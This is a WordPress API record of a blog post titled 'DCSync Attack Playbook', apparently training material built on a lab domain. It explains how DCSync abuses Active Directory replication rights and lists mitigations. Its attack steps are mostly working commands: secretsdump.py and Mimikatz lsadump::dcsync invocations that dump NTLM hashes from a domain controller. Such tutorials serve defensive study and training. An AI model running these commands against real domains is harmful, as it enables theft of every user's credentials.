{"id":217,"date":"2025-01-23T00:00:00","date_gmt":"2025-01-22T23:00:00","guid":{"rendered":"https:\/\/kosokoking.com\/?p=217"},"modified":"2025-01-19T19:22:10","modified_gmt":"2025-01-19T18:22:10","slug":"dcsync-attack-playbook","status":"publish","type":"post","link":"https:\/\/kosokoking.com\/index.php\/security\/dcsync-attack-playbook\/","title":{"rendered":"DCSync Attack Playbook"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">What is DCSync?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">DCSync is a technique used to steal the Active Directory password database by exploiting the Directory Replication Service Remote Protocol. It allows an attacker to impersonate a Domain Controller and retrieve user NTLM password hashes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">How DCSync Works<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>The attacker uses an account with domain replication rights.<\/li>\n\n\n\n<li>They request password replication from a Domain Controller using the DS-Replication-Get-Changes-All extended right.<\/li>\n\n\n\n<li>This allows retrieval of NTLM password hashes for any domain user, including previous password hashes.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Required Permissions<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To perform a DCSync attack, an account must have:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Replicating Directory Changes<\/li>\n\n\n\n<li>Replicating Directory Changes All permissions<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Note<\/strong>: Domain\/Enterprise Admins and default domain administrators have these rights by default.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Detection and Enumeration<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Using PowerView<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Identify user&#8217;s SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Check replication rights:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>$sid = \"S-1-5-21-3842939050-3880317879-2865463114-1164\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-ObjectAcl \"DC=inlanefreight,DC=local\" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get') } | ? { $_.SecurityIdentifier -match $sid } | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Executing DCSync<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Using secretsdump.py (Linux)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT\/adunn@172.16.5.5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Options<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-just-dc-ntlm: Extract only NTLM hashes<\/li>\n\n\n\n<li>-just-dc-user &lt;USERNAME>: Extract data for a specific user<\/li>\n\n\n\n<li>-pwd-last-set: Show password last change date<\/li>\n\n\n\n<li>-history: Dump password history<\/li>\n\n\n\n<li>-userstatus: Check if a user is disabled<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Using Mimikatz (Windows)<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Run PowerShell as the user with DCSync privileges:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>runas \/netonly \/user:INLANEFREIGHT\\adunn powershell<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Execute Mimikatz commands:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>.\\mimikatz.exe<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>privilege::debug<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>lsadump::dcsync \/domain:INLANEFREIGHT.LOCAL \/user:INLANEFREIGHT\\administrator<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Additional Considerations<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><strong>Reversible Encryption<\/strong>: Some accounts may have passwords stored using reversible encryption. Enumerate these accounts:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-ADUser -<strong>Filter<\/strong> 'userAccountControl -band 128' -Properties userAccountControl<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>Password Audits<\/strong>: DCSync can be used for legitimate password audits. However, ensure proper authorisation and documentation.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Mitigation Strategies<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Limit accounts with replication rights<\/li>\n\n\n\n<li>Implement strong access controls<\/li>\n\n\n\n<li>Monitor for unusual replication requests<\/li>\n\n\n\n<li>Use Advanced Threat Analytics or similar tools to detect DCSync attempts<\/li>\n\n\n\n<li>Regularly audit accounts with sensitive permissions<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Recommended Reading<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/get-started\/replication\/active-directory-replication-concepts\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft Documentation on Active Directory Replication<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/006\/\" target=\"_blank\" rel=\"noreferrer noopener\">MITRE ATT&amp;CK: DCSync<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/adsecurity.org\/?p=1729\" target=\"_blank\" rel=\"noreferrer noopener\">Detecting DCSync Attacks<\/a><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">By following this playbook, organisations can better understand, detect, and mitigate DCSync attacks, enhancing their overall Active Directory security posture.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[149,151,51,150,152,157,153,154,156,155],"class_list":["post-217","post","type-post","status-publish","format-standard","hentry","category-security","tag-active-directory","tag-credential-theft","tag-cybersecurity","tag-dcsync","tag-hacking","tag-lateral-movement","tag-mimikatz","tag-network-security-2","tag-privilege-escalation","tag-windows-security"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/comments?post=217"}],"version-history":[{"count":1,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217\/revisions"}],"predecessor-version":[{"id":218,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/217\/revisions\/218"}],"wp:attachment":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/media?parent=217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/categories?post=217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/tags?post=217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}